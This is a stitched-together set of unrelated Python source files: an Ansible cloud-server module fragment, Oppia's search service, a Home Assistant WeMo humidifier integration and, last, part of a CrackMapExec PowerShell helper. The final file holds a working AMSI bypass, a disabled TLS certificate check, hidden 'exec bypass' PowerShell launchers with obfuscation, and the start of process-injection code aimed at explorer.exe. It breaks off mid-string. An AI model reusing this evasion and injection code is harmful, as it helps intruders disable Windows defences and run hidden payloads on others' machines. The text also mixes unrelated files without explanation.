        server_uuid = [obj['id']
                       for obj in res['links'] if obj['rel'] == 'self'][0]
        # Change the request server method to a _find_server_by_uuid closure so
        # that it will work
        result.requests[0].Server = lambda: ClcServer._find_server_by_uuid_w_retry(
            clc,
            module,
            server_uuid,
            server_params.get('alias'))
        return result
@staticmethod
def _get_anti_affinity_policy_id(clc, module, alias, aa_policy_name):
"""
retrieves the anti affinity policy id of the server based on the name of the policy
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param alias: the CLC account alias
:param aa_policy_name: the anti affinity policy name
:return: aa_policy_id: The anti affinity policy id
"""
aa_policy_id = None
try:
aa_policies = clc.v2.API.Call(method='GET',
url='antiAffinityPolicies/%s' % alias)
except APIFailedResponse as ex:
return module.fail_json(msg='Unable to fetch anti affinity policies for account: {0}. {1}'.format(
alias, ex.response_text))
for aa_policy in aa_policies.get('items'):
if aa_policy.get('name') == aa_policy_name:
if not aa_policy_id:
aa_policy_id = aa_policy.get('id')
else:
return module.fail_json(
msg='multiple anti affinity policies were found with policy name : %s' % aa_policy_name)
return aa_policy_id
    #
    # This is the function that gets patched onto the Request's Server attribute using a lambda closure
    #
@staticmethod
def _find_server_by_uuid_w_retry(
clc, module, svr_uuid, alias=None, retries=5, back_out=2):
"""
Find the clc server by the UUID returned from the provisioning request. Retry the request if a 404 is returned.
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param svr_uuid: UUID of the server
:param retries: the number of retry attempts to make prior to fail. default is 5
:param alias: the Account Alias to search
:return: a clc-sdk.Server instance
"""
if not alias:
alias = clc.v2.Account.GetAlias()
# Wait and retry if the api returns a 404
while True:
retries -= 1
try:
server_obj = clc.v2.API.Call(
method='GET', url='servers/%s/%s?uuid=true' %
(alias, svr_uuid))
server_id = server_obj['id']
server = clc.v2.Server(
id=server_id,
alias=alias,
server_obj=server_obj)
return server
except APIFailedResponse as e:
if e.response_status_code != 404:
return module.fail_json(
msg='A failure response was received from CLC API when '
'attempting to get details for a server: UUID=%s, Code=%i, Message=%s' %
(svr_uuid, e.response_status_code, e.message))
if retries == 0:
return module.fail_json(
msg='Unable to reach the CLC API after 5 attempts')
time.sleep(back_out)
back_out *= 2
@staticmethod
def _set_user_agent(clc):
if hasattr(clc, 'SetRequestsSession'):
agent_string = "ClcAnsibleModule/" + __version__
ses = requests.Session()
ses.headers.update({"Api-Client": agent_string})
ses.headers['User-Agent'] += " " + agent_string
clc.SetRequestsSession(ses)
def main():
    """
    The main function. Instantiates the module and calls process_request.
    :return: none
    """
    # Build the AnsibleModule from the shared argument spec, including the
    # mutually_exclusive constraints, with check mode supported.
    argument_dict = ClcServer._define_module_argument_spec()
    module = AnsibleModule(supports_check_mode=True, **argument_dict)
    clc_server = ClcServer(module)
    clc_server.process_request()
# Standard Ansible module entry point: run only when executed directly.
if __name__ == '__main__':
    main()
| |
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS-IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Provides search services."""
__author__ = 'Frederik Creemers'
import datetime
import logging
import numbers
import feconf
from google.appengine.api import search as gae_search
DEFAULT_NUM_RETRIES = 3
class SearchFailureError(Exception):
    """This error is raised when a search operation fails.
    The original_exception will point to what went wrong inside the gae sdk.
    Other platform implementations should have a similar way of revealing
    platform specific errors."""

    def __init__(self, original_exception=None):
        detail = '%s: %s' % (
            type(original_exception), original_exception.message)
        super(SearchFailureError, self).__init__(detail)
        # Keep a handle on the underlying SDK error for callers to inspect.
        self.original_exception = original_exception
def add_documents_to_index(documents, index, retries=DEFAULT_NUM_RETRIES):
    """Adds a document to an index.
    Args:
    - documents: a list of documents. Each document should be a dictionary.
        Every key in the document is a field name, and the corresponding
        value will be the field's value.
        If there is a key named 'id', its value will be used as the
        document's id.
        If there is a key named 'rank', its value will be used as
        the document's rank.
        By default, search results are returned ordered by descending rank.
        If there is a key named 'language_code', its value will be used as
        the document's language. Otherwise, feconf.DEFAULT_LANGUAGE_CODE is
        used.
    - index: the name of the index to insert the document into, a string.
    - retries: the number of times to retry inserting the documents.
    Returns:
        returns a list of document ids of the documents that were added.
    Raises:
    - SearchFailureError: raised when the indexing fails. If it fails for any
        document, none will be inserted.
    - ValueError: raised when invalid values are given.
    """
    if not isinstance(index, basestring):
        raise ValueError(
            'Index must be the unicode/str name of an index, got %s'
            % type(index))
    index = gae_search.Index(index)
    gae_docs = [_dict_to_search_document(d) for d in documents]
    try:
        logging.debug('adding the following docs to index %s: %s',
                      index.name, documents)
        # put() inserts all documents atomically or raises PutError.
        results = index.put(gae_docs, deadline=5)
    except gae_search.PutError as e:
        logging.exception('PutError raised.')
        if retries > 1:
            # Retry only when at least one failure is transient; permanent
            # errors are surfaced to the caller immediately.
            for res in e.results:
                if res.code == gae_search.OperationResult.TRANSIENT_ERROR:
                    new_retries = retries - 1
                    logging.debug('%d tries left, retrying.' % (new_retries))
                    return add_documents_to_index(
                        documents=documents,
                        index=index.name,
                        retries=new_retries)
        # At this point, either we don't have any tries left, or none of the
        # results has a transient error code.
        raise SearchFailureError(e)
    return [r.id for r in results]
def _dict_to_search_document(d):
    """Converts a dict into a gae_search.Document.

    The 'id', 'rank' and 'language_code' keys map to the document's id, rank
    and language; every other key/value pair becomes one or more search
    fields via _make_fields.

    Args:
    - d: a dict representing a single document.

    Returns:
        a gae_search.Document.

    Raises:
    - ValueError: if d is not a dict.
    """
    if not isinstance(d, dict):
        raise ValueError('document should be a dictionary, got %s' % type(d))
    doc_id = d.get('id')
    rank = d.get('rank')
    language_code = d.get('language_code')
    fields = []
    # NOTE(review): 'language_code' is not excluded below, so it is also
    # indexed as a regular field in addition to setting the document's
    # language — verify this is intended.
    for key, value in d.iteritems():
        if key not in ['id', 'rank']:
            fields += _make_fields(key, value)
    doc = gae_search.Document(
        doc_id=doc_id, fields=fields, rank=rank, language=language_code)
    return doc
def _make_fields(key, value):
    """Builds the gae_search field(s) for a single key/value pair.

    Lists are validated and expanded into one field per element (all sharing
    the same field name). Strings become TextFields, numbers NumberFields,
    and date/datetime values DateFields.

    Args:
    - key: the field name, a string.
    - value: a string, number, date/datetime, or a list of such values.

    Returns:
        a list of gae_search field instances.

    Raises:
    - ValueError: if value (or any list element) has an unsupported type.
    """
    if isinstance(value, list):
        _validate_list(key, value)
        # Each element is a scalar, so the recursive call always returns
        # exactly one field; [0] unwraps it.
        return [_make_fields(key, v)[0] for v in value]
    if isinstance(value, basestring):
        return [gae_search.TextField(name=key, value=value)]
    if isinstance(value, numbers.Number):
        return [gae_search.NumberField(name=key, value=value)]
    # datetime.datetime subclasses datetime.date, so the date check alone
    # would match both; both are spelled out for explicitness.
    if isinstance(value, datetime.datetime) or isinstance(
            value, datetime.date):
        return [gae_search.DateField(name=key, value=value)]
    raise ValueError(
        'Value for document field %s should be a (unicode) string, numeric '
        'type, datetime.date, datetime.datetime or list of such types, got %s'
        % (key, type(value)))
def _validate_list(key, value):
    """Validates a list to be included as document fields.

    Args:
    - key: the field name; only used to build a helpful error message.
    - value: the list whose elements are checked.

    Raises:
    - ValueError: if any element is not a string, number, date or datetime.
    """
    for i in xrange(len(value)):
        element = value[i]
        if not (isinstance(element, basestring) or
                isinstance(element, datetime.date) or
                isinstance(element, datetime.datetime) or
                isinstance(element, numbers.Number)):
            # NOTE: the index reported is 0-based.
            raise ValueError(
                'All values of a multi-valued field must be numbers, strings, '
                'date or datetime instances, The %dth value for field %s has'
                ' type %s.' % (i, key, type(element)))
def delete_documents_from_index(
        doc_ids, index, retries=DEFAULT_NUM_RETRIES):
    """Deletes documents from an index, retrying on transient errors.

    Args:
    - doc_ids: a list of document ids of documents to be deleted from the
        index.
    - index: the name of the index to delete the document from, a string.
    - retries: the number of times to retry deleting the documents.

    Raises:
    - SearchFailureError: raised when the deletion fails. If it fails for any
        document, none will be deleted.
    - ValueError: raised when index or any doc_id has the wrong type.
    """
    if not isinstance(index, basestring):
        raise ValueError(
            'Index must be the unicode/str name of an index, got %s'
            % type(index))
    for i in xrange(len(doc_ids)):
        if not isinstance(doc_ids[i], basestring):
            raise ValueError('all doc_ids must be string, got %s at index %d' %
                             (type(doc_ids[i]), i))
    index = gae_search.Index(index)
    try:
        logging.debug('Attempting to delete documents from index %s, ids: %s' %
                      (index.name, ', '.join(doc_ids)))
        index.delete(doc_ids, deadline=5)
    except gae_search.DeleteError as e:
        logging.exception('Something went wrong during deletion.')
        if retries > 1:
            # Retry the whole batch if any individual result failed with a
            # transient error code.
            for res in e.results:
                if res.code == gae_search.OperationResult.TRANSIENT_ERROR:
                    new_retries = retries - 1
                    logging.debug('%d tries left, retrying.' % (new_retries))
                    delete_documents_from_index(
                        doc_ids=doc_ids,
                        index=index.name,
                        retries=new_retries)
                    return
        # At this point, either we don't have any tries left, or none of the
        # results has a transient error code.
        raise SearchFailureError(e)
def clear_index(index_name):
    """Clears an index completely.

    WARNING: This does all the clearing in-request, and may therefore fail if
    there are too many entries in the index.

    Args:
    - index_name: the name of the index to clear, a string.
    """
    index = gae_search.Index(index_name)
    # Fetch ids one page at a time and delete them until the index is empty.
    while True:
        doc_ids = [
            document.doc_id for document in index.get_range(ids_only=True)]
        if not doc_ids:
            break
        index.delete(doc_ids)
def search(query_string, index, cursor=None, limit=feconf.GALLERY_PAGE_SIZE,
           sort='', ids_only=False, retries=DEFAULT_NUM_RETRIES):
    """Searches for documents in an index.

    Args:
    - query_string: the search query.
        The syntax used is described here:
        https://developers.google.com/appengine/docs/python/search/query_strings
    - index: the name of the index to search.
    - cursor: a cursor string, as returned by this function. Pass this in to
        get the next 'page' of results. Leave as None to start at the
        beginning.
    - limit: the maximum number of documents to return.
    - sort: a string indicating how to sort results. This should be a string
        of space separated values. Each value should start with a '+' or a
        '-' character indicating whether to sort in ascending or descending
        order respectively. This character should be followed by a field name
        to sort on.
    - ids_only: whether to only return document ids.
    - retries: the number of times to retry searching the index.

    Returns:
        returns a tuple with two elements:
        - a list of dictionaries representing search documents. If ids_only is
            True, this will be a list of strings, doc_ids.
        - a cursor that you can pass back in to get the next page of results.
            This will be a web safe string that you can use in urls.
            It will be None if there is no next page.

    Raises:
    - SearchFailureError: if the search repeatedly fails with transient
        errors and no retries remain.
    """
    sort_options = None
    if cursor is None:
        gae_cursor = gae_search.Cursor()
    else:
        gae_cursor = gae_search.Cursor(web_safe_string=cursor)
    if sort:
        expr = _string_to_sort_expressions(sort)
        sort_options = gae_search.SortOptions(expr)
    options = gae_search.QueryOptions(
        limit=limit,
        cursor=gae_cursor,
        ids_only=ids_only,
        sort_options=sort_options)
    try:
        query = gae_search.Query(query_string, options=options)
    except gae_search.QueryError as e:
        # This can happen for query strings like "NOT" or a string that
        # contains backslashes.
        # NOTE(review): the parse failure is swallowed and an empty result
        # page is returned instead of raising; 'e' is intentionally unused.
        logging.exception('Could not parse query string %s' % query_string)
        return [], None
    index = gae_search.Index(index)
    try:
        logging.debug('attempting a search with query %s' % query)
        results = index.search(query)
    except gae_search.TransientError as e:
        logging.exception('something went wrong while searching.')
        if retries > 1:
            # Retry the identical search with one fewer attempt remaining.
            logging.debug('%d attempts left, retrying...' % (retries - 1))
            return search(
                query_string,
                index.name,
                cursor=cursor,
                limit=limit,
                sort=sort,
                ids_only=ids_only,
                retries=retries - 1)
        else:
            raise SearchFailureError(e)
    # A missing cursor means there is no next page of results.
    result_cursor_str = None
    if results.cursor:
        result_cursor_str = results.cursor.web_safe_string
    if ids_only:
        result_docs = [doc.doc_id for doc in results.results]
    else:
        result_docs = [
            _search_document_to_dict(doc) for doc in results.results]
    return result_docs, result_cursor_str
def _string_to_sort_expressions(s):
    """Converts a sort string into a list of gae_search.SortExpressions.

    Args:
    - s: a space-separated string of field names, each prefixed with '+'
        (ascending) or '-' (descending).

    Returns:
        a list of gae_search.SortExpression objects, in the same order.

    Raises:
    - ValueError: if any token lacks a '+'/'-' direction prefix.
    """
    sort_expressions = []
    s_tokens = s.split()
    for expression in s_tokens:
        if expression.startswith('+'):
            direction = gae_search.SortExpression.ASCENDING
        elif expression.startswith('-'):
            direction = gae_search.SortExpression.DESCENDING
        else:
            raise ValueError(
                'Fields in the sort expression must start with "+"'
                ' or "-" to indicate sort direction.'
                ' The field %s has no such indicator'
                ' in expression "%s".' % (expression, s))
        # expression[1:] strips the direction prefix, leaving the field name.
        sort_expressions.append(gae_search.SortExpression(expression[1:],
                                                          direction))
    return sort_expressions
def get_document_from_index(doc_id, index):
    """Returns a document with the given doc_id from the index.

    Args:
    - doc_id: a doc_id, as a string.
    - index: the name of an index, a string.

    Returns:
        the requested document, as a dict.
    """
    index = gae_search.Index(index)
    return _search_document_to_dict(index.get(doc_id))
def _search_document_to_dict(doc):
d = {'id': doc.doc_id, 'language_code': doc.language, 'rank': doc.rank}
for field in doc.fields:
d[field.name] = field.value
return d
| |
"""Support for WeMo humidifier."""
import asyncio
import logging
from datetime import timedelta
import requests
import async_timeout
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.fan import (
DOMAIN,
SUPPORT_SET_SPEED,
FanEntity,
SPEED_OFF,
SPEED_LOW,
SPEED_MEDIUM,
SPEED_HIGH,
)
from homeassistant.exceptions import PlatformNotReady
from homeassistant.const import ATTR_ENTITY_ID
from . import SUBSCRIPTION_REGISTRY
SCAN_INTERVAL = timedelta(seconds=10)
# Key under which this platform stores its entities in hass.data.
DATA_KEY = "fan.wemo"
_LOGGER = logging.getLogger(__name__)
# Extra state attribute names exposed via device_state_attributes.
ATTR_CURRENT_HUMIDITY = "current_humidity"
ATTR_TARGET_HUMIDITY = "target_humidity"
ATTR_FAN_MODE = "fan_mode"
ATTR_FILTER_LIFE = "filter_life"
ATTR_FILTER_EXPIRED = "filter_expired"
ATTR_WATER_LEVEL = "water_level"
# The WEMO_ constants below come from pywemo itself
WEMO_ON = 1
WEMO_OFF = 0
# Discrete target-humidity setpoints supported by the device.
WEMO_HUMIDITY_45 = 0
WEMO_HUMIDITY_50 = 1
WEMO_HUMIDITY_55 = 2
WEMO_HUMIDITY_60 = 3
WEMO_HUMIDITY_100 = 4
WEMO_FAN_OFF = 0
WEMO_FAN_MINIMUM = 1
WEMO_FAN_LOW = 2 # Not used due to limitations of the base fan implementation
WEMO_FAN_MEDIUM = 3
WEMO_FAN_HIGH = 4 # Not used due to limitations of the base fan implementation
WEMO_FAN_MAXIMUM = 5
WEMO_WATER_EMPTY = 0
WEMO_WATER_LOW = 1
WEMO_WATER_GOOD = 2
SUPPORTED_SPEEDS = [SPEED_OFF, SPEED_LOW, SPEED_MEDIUM, SPEED_HIGH]
SUPPORTED_FEATURES = SUPPORT_SET_SPEED
# Since the base fan object supports a set list of fan speeds,
# we have to reuse some of them when mapping to the 5 WeMo speeds
WEMO_FAN_SPEED_TO_HASS = {
    WEMO_FAN_OFF: SPEED_OFF,
    WEMO_FAN_MINIMUM: SPEED_LOW,
    WEMO_FAN_LOW: SPEED_LOW,  # Reusing SPEED_LOW
    WEMO_FAN_MEDIUM: SPEED_MEDIUM,
    WEMO_FAN_HIGH: SPEED_HIGH,  # Reusing SPEED_HIGH
    WEMO_FAN_MAXIMUM: SPEED_HIGH,
}
# Because we reused mappings in the previous dict, we have to filter them
# back out in this dict, or else we would have duplicate keys
HASS_FAN_SPEED_TO_WEMO = {
    v: k
    for (k, v) in WEMO_FAN_SPEED_TO_HASS.items()
    if k not in [WEMO_FAN_LOW, WEMO_FAN_HIGH]
}
# Custom services registered in setup_platform, plus their call schemas.
SERVICE_SET_HUMIDITY = "wemo_set_humidity"
SET_HUMIDITY_SCHEMA = vol.Schema(
    {
        vol.Required(ATTR_ENTITY_ID): cv.entity_ids,
        vol.Required(ATTR_TARGET_HUMIDITY): vol.All(
            vol.Coerce(float), vol.Range(min=0, max=100)
        ),
    }
)
SERVICE_RESET_FILTER_LIFE = "wemo_reset_filter_life"
RESET_FILTER_LIFE_SCHEMA = vol.Schema({vol.Required(ATTR_ENTITY_ID): cv.entity_ids})
def setup_platform(hass, config, add_entities, discovery_info=None):
    """Set up discovered WeMo humidifiers."""
    # Imported lazily so pywemo is only loaded when this platform is used.
    from pywemo import discovery

    if DATA_KEY not in hass.data:
        hass.data[DATA_KEY] = {}
    # This platform is discovery-only; nothing to do for manual config.
    if discovery_info is None:
        return
    location = discovery_info["ssdp_description"]
    mac = discovery_info["mac_address"]
    try:
        device = WemoHumidifier(discovery.device_from_description(location, mac))
    except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as err:
        _LOGGER.error("Unable to access %s (%s)", location, err)
        # Ask Home Assistant to retry setting up this platform later.
        raise PlatformNotReady
    hass.data[DATA_KEY][device.entity_id] = device
    add_entities([device])

    def service_handle(service):
        """Handle the WeMo humidifier services."""
        entity_ids = service.data.get(ATTR_ENTITY_ID)
        # Resolve the targeted entity ids to our registered device objects.
        humidifiers = [
            device
            for device in hass.data[DATA_KEY].values()
            if device.entity_id in entity_ids
        ]
        if service.service == SERVICE_SET_HUMIDITY:
            target_humidity = service.data.get(ATTR_TARGET_HUMIDITY)
            for humidifier in humidifiers:
                humidifier.set_humidity(target_humidity)
        elif service.service == SERVICE_RESET_FILTER_LIFE:
            for humidifier in humidifiers:
                humidifier.reset_filter_life()

    # Register service(s)
    hass.services.register(
        DOMAIN, SERVICE_SET_HUMIDITY, service_handle, schema=SET_HUMIDITY_SCHEMA
    )
    hass.services.register(
        DOMAIN,
        SERVICE_RESET_FILTER_LIFE,
        service_handle,
        schema=RESET_FILTER_LIFE_SCHEMA,
    )
class WemoHumidifier(FanEntity):
    """Representation of a WeMo humidifier."""

    def __init__(self, device):
        """Initialize the WeMo switch."""
        # pywemo device object; all state reads/writes go through it.
        self.wemo = device
        self._state = None
        # Assume reachable until an update proves otherwise.
        self._available = True
        # Created in async_added_to_hass so it binds to the right event loop.
        self._update_lock = None
        self._fan_mode = None
        self._target_humidity = None
        self._current_humidity = None
        self._water_level = None
        self._filter_life = None
        self._filter_expired = None
        # Remembered so turn_on() without an explicit speed restores the
        # last non-off fan mode.
        self._last_fan_on_mode = WEMO_FAN_MEDIUM
        self._model_name = self.wemo.model_name
        self._name = self.wemo.name
        self._serialnumber = self.wemo.serialnumber

    def _subscription_callback(self, _device, _type, _params):
        """Update the state by the Wemo device."""
        _LOGGER.info("Subscription update for %s", self.name)
        updated = self.wemo.subscription_update(_type, _params)
        # Called from the subscription thread; hand off to the event loop.
        # A failed partial update (not updated) forces a full refresh.
        self.hass.add_job(self._async_locked_subscription_callback(not updated))

    async def _async_locked_subscription_callback(self, force_update):
        """Handle an update from a subscription."""
        # If an update is in progress, we don't do anything
        if self._update_lock.locked():
            return
        await self._async_locked_update(force_update)
        self.async_schedule_update_ha_state()

    @property
    def unique_id(self):
        """Return the ID of this WeMo humidifier."""
        return self._serialnumber

    @property
    def name(self):
        """Return the name of the humidifier if any."""
        return self._name

    @property
    def is_on(self):
        """Return true if switch is on. Standby is on."""
        return self._state

    @property
    def available(self):
        """Return true if switch is available."""
        return self._available

    @property
    def icon(self):
        """Return the icon of device based on its type."""
        return "mdi:water-percent"

    @property
    def device_state_attributes(self):
        """Return device specific state attributes."""
        return {
            ATTR_CURRENT_HUMIDITY: self._current_humidity,
            ATTR_TARGET_HUMIDITY: self._target_humidity,
            ATTR_FAN_MODE: self._fan_mode,
            ATTR_WATER_LEVEL: self._water_level,
            ATTR_FILTER_LIFE: self._filter_life,
            ATTR_FILTER_EXPIRED: self._filter_expired,
        }

    @property
    def speed(self) -> str:
        """Return the current speed."""
        return WEMO_FAN_SPEED_TO_HASS.get(self._fan_mode)

    @property
    def speed_list(self) -> list:
        """Get the list of available speeds."""
        return SUPPORTED_SPEEDS

    @property
    def supported_features(self) -> int:
        """Flag supported features."""
        return SUPPORTED_FEATURES

    async def async_added_to_hass(self):
        """Wemo humidifier added to HASS."""
        # Define inside async context so we know our event loop
        self._update_lock = asyncio.Lock()
        registry = SUBSCRIPTION_REGISTRY
        # register() does blocking I/O, so run it in the executor.
        await self.hass.async_add_executor_job(registry.register, self.wemo)
        registry.on(self.wemo, None, self._subscription_callback)

    async def async_update(self):
        """Update WeMo state.
        Wemo has an aggressive retry logic that sometimes can take over a
        minute to return. If we don't get a state after 5 seconds, assume the
        Wemo humidifier is unreachable. If update goes through, it will be made
        available again.
        """
        # If an update is in progress, we don't do anything
        if self._update_lock.locked():
            return
        try:
            with async_timeout.timeout(5):
                # shield() lets the underlying update finish even if this
                # caller times out, so the lock is always released.
                await asyncio.shield(self._async_locked_update(True))
        except asyncio.TimeoutError:
            _LOGGER.warning("Lost connection to %s", self.name)
            self._available = False

    async def _async_locked_update(self, force_update):
        """Try updating within an async lock."""
        async with self._update_lock:
            await self.hass.async_add_executor_job(self._update, force_update)

    def _update(self, force_update=True):
        """Update the device state."""
        try:
            self._state = self.wemo.get_state(force_update)
            self._fan_mode = self.wemo.fan_mode_string
            self._target_humidity = self.wemo.desired_humidity_percent
            self._current_humidity = self.wemo.current_humidity_percent
            self._water_level = self.wemo.water_level_string
            self._filter_life = self.wemo.filter_life_percent
            self._filter_expired = self.wemo.filter_expired
            # Track the last running fan mode so turn_on() can restore it.
            if self.wemo.fan_mode != WEMO_FAN_OFF:
                self._last_fan_on_mode = self.wemo.fan_mode
            if not self._available:
                _LOGGER.info("Reconnected to %s", self.name)
                self._available = True
        except AttributeError as err:
            # NOTE(review): pywemo surfaces communication failures as
            # AttributeError here; the device is marked unavailable.
            _LOGGER.warning("Could not update status for %s (%s)", self.name, err)
            self._available = False

    def turn_on(self, speed: str = None, **kwargs) -> None:
        """Turn the switch on."""
        if speed is None:
            # No speed requested: resume the last known non-off fan mode.
            self.wemo.set_state(self._last_fan_on_mode)
        else:
            self.set_speed(speed)

    def turn_off(self, **kwargs) -> None:
        """Turn the switch off."""
        self.wemo.set_state(WEMO_FAN_OFF)

    def set_speed(self, speed: str) -> None:
        """Set the fan_mode of the Humidifier."""
        self.wemo.set_state(HASS_FAN_SPEED_TO_WEMO.get(speed))

    def set_humidity(self, humidity: float) -> None:
        """Set the target humidity level for the Humidifier."""
        # Map the continuous 0-100 input onto the device's discrete
        # setpoints: <50 -> 45%, <55 -> 50%, <60 -> 55%, <100 -> 60%,
        # >=100 -> 100%.
        if humidity < 50:
            self.wemo.set_humidity(WEMO_HUMIDITY_45)
        elif 50 <= humidity < 55:
            self.wemo.set_humidity(WEMO_HUMIDITY_50)
        elif 55 <= humidity < 60:
            self.wemo.set_humidity(WEMO_HUMIDITY_55)
        elif 60 <= humidity < 100:
            self.wemo.set_humidity(WEMO_HUMIDITY_60)
        elif humidity >= 100:
            self.wemo.set_humidity(WEMO_HUMIDITY_100)

    def reset_filter_life(self) -> None:
        """Reset the filter life to 100%."""
        self.wemo.reset_filter_life()
| |
import cme
import os
import logging
import re
import tempfile
from sys import exit
from string import ascii_lowercase
from random import choice, randrange, sample
from subprocess import check_output, call
from cme.helpers.misc import gen_random_string, which
from cme.logger import CMEAdapter
from base64 import b64encode
# Module-level logger shared by every helper in this file.
logger = CMEAdapter()
# Module-level switch; presumably flipped by the caller/CLI to route scripts
# through Invoke-Obfuscation in obfs_ps_script() — confirm against callers.
obfuscate_ps_scripts = False
def get_ps_script(path):
    """Resolves *path* relative to cme's bundled 'data' directory."""
    data_dir = os.path.join(os.path.dirname(cme.__file__), 'data')
    return os.path.join(data_dir, path)
def encode_ps_command(command):
    """Base64-encodes *command* as UTF-16LE, the encoding that
    powershell.exe expects for its -enc argument."""
    utf16_payload = command.encode('UTF-16LE')
    return b64encode(utf16_payload)
def is_powershell_installed():
    """Reports whether a 'powershell' binary can be found on PATH."""
    return bool(which('powershell'))
def obfs_ps_script(path_to_script):
    """Returns the source of a bundled PowerShell script, obfuscated.

    When a local powershell binary is available and the module-level
    obfuscate_ps_scripts flag is set, the script is run through
    Invoke-Obfuscation once and the result is cached under
    ~/.cme/obfuscated_scripts/. Otherwise the raw script is returned with
    comments, blank lines and Write-Verbose/Write-Debug statements stripped.
    """
    ps_script = path_to_script.split('/')[-1]
    obfs_script_dir = os.path.join(os.path.expanduser('~/.cme'), 'obfuscated_scripts')
    obfs_ps_script = os.path.join(obfs_script_dir, ps_script)
    if is_powershell_installed() and obfuscate_ps_scripts:
        # Obfuscation is expensive, so reuse a previously generated copy.
        if os.path.exists(obfs_ps_script):
            logger.info('Using cached obfuscated Powershell script')
            with open(obfs_ps_script, 'r') as script:
                return script.read()
        logger.info('Performing one-time script obfuscation, go look at some memes cause this can take a bit...')
        invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "TOKEN,ALL,1,OUT {}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),
                                                                                                                                                 get_ps_script(path_to_script),
                                                                                                                                                 obfs_ps_script)
        logging.debug(invoke_obfs_command)
        # NOTE(review): the exit status is captured but never checked, so a
        # failed obfuscation run is still reported as a success below.
        with open(os.devnull, 'w') as devnull:
            return_code = call(invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True)
        logger.success('Script obfuscated successfully')
        with open(obfs_ps_script, 'r') as script:
            return script.read()
    else:
        with open(get_ps_script(path_to_script), 'r') as script:
            """
            Strip block comments, line comments, empty lines, verbose statements,
            and debug statements from a PowerShell source file.
            """
            # strip block comments
            strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '', script.read())
            # strip blank lines, lines starting with #, and verbose/debug statements
            strippedCode = "\n".join([line for line in strippedCode.split('\n') if ((line.strip() != '') and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")) )])
            return strippedCode
def create_ps_command(ps_command, force_ps32=False, dont_obfs=False):
    """Wraps *ps_command* into a single powershell.exe command line.

    An AMSI bypass is prepended, the payload is optionally forced into a
    32-bit PowerShell job (force_ps32), and the result is either
    string-obfuscated via invoke_obfuscation() (default) or base64-encoded
    for -enc when dont_obfs is True. Exits the process when the final
    command exceeds the 8191-character cmd.exe limit.
    """
    amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
"""
    if force_ps32:
        # Run the payload inside a -RunAs32 job when the host is 64-bit so
        # the command always executes in a 32-bit PowerShell.
        command = amsi_bypass + """
$functions = {{
    function Command-ToExecute
    {{
{command}
    }}
}}
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
{{
    $job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32
    $job | Wait-Job
}}
else
{{
    IEX "$functions"
    Command-ToExecute
}}
""".format(command=amsi_bypass + ps_command)
    else:
        command = amsi_bypass + ps_command
    logging.debug('Generated PS command:\n {}\n'.format(command))
    # We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed concurrently
    # it would spawn a local powershell process per host which isn't ideal, until I figure out a good way of dealing with this
    # it will use the partial python implementation that I stole from GreatSCT (https://github.com/GreatSCT/GreatSCT) <3
    """
    if is_powershell_installed():
        temp = tempfile.NamedTemporaryFile(prefix='cme_',
                                           suffix='.ps1',
                                           dir='/tmp')
        temp.write(command)
        temp.read()
        encoding_types = [1,2,3,4,5,6]
        while True:
            encoding = random.choice(encoding_types)
            invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),
                                                                                                                                             temp.name,
                                                                                                                                             encoding)
            logging.debug(invoke_obfs_command)
            out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip()
            command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out)
            logging.debug('Command length: {}'.format(len(command)))
            if len(command) <= 8192:
                temp.close()
                break
            encoding_types.remove(encoding)
    else:
    """
    if not dont_obfs:
        # Re-roll the randomized obfuscation a few times in case a roll
        # happens to exceed the command-line length limit.
        obfs_attempts = 0
        while True:
            command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "' + invoke_obfuscation(command) + '"'
            if len(command) <= 8191:
                break
            if obfs_attempts == 4:
                logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
                exit(1)
            obfs_attempts += 1
    else:
        # NOTE(review): under Python 3 encode_ps_command() returns bytes, so
        # this format() would embed "b'...'" — this code path assumes
        # Python 2. Verify before porting.
        command = 'powershell.exe -noni -nop -w 1 -enc {}'.format(encode_ps_command(command))
        if len(command) > 8191:
            logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
            exit(1)
    return command
def gen_ps_inject(command, context=None, procname='explorer.exe', inject_once=False):
    """Builds PowerShell that injects *command* into running processes.

    The generated code enumerates processes named *procname*, preferring one
    owned by the active console session, and runs Invoke-PSInject against
    each candidate. With inject_once=True, injection stops after the console
    session succeeds. When *context* is given, the code is wrapped in an IEX
    download cradle that first fetches Invoke-PSInject.ps1 from our server.
    """
    # The following code gives us some control over where and how Invoke-PSInject does its thang
    # It prioritizes injecting into a process of the active console session
    ps_code = '''
$injected = $False
$inject_once = {inject_once}
$command = "{command}"
$owners = @{{}}
$console_login = gwmi win32_computersystem | select -exp Username
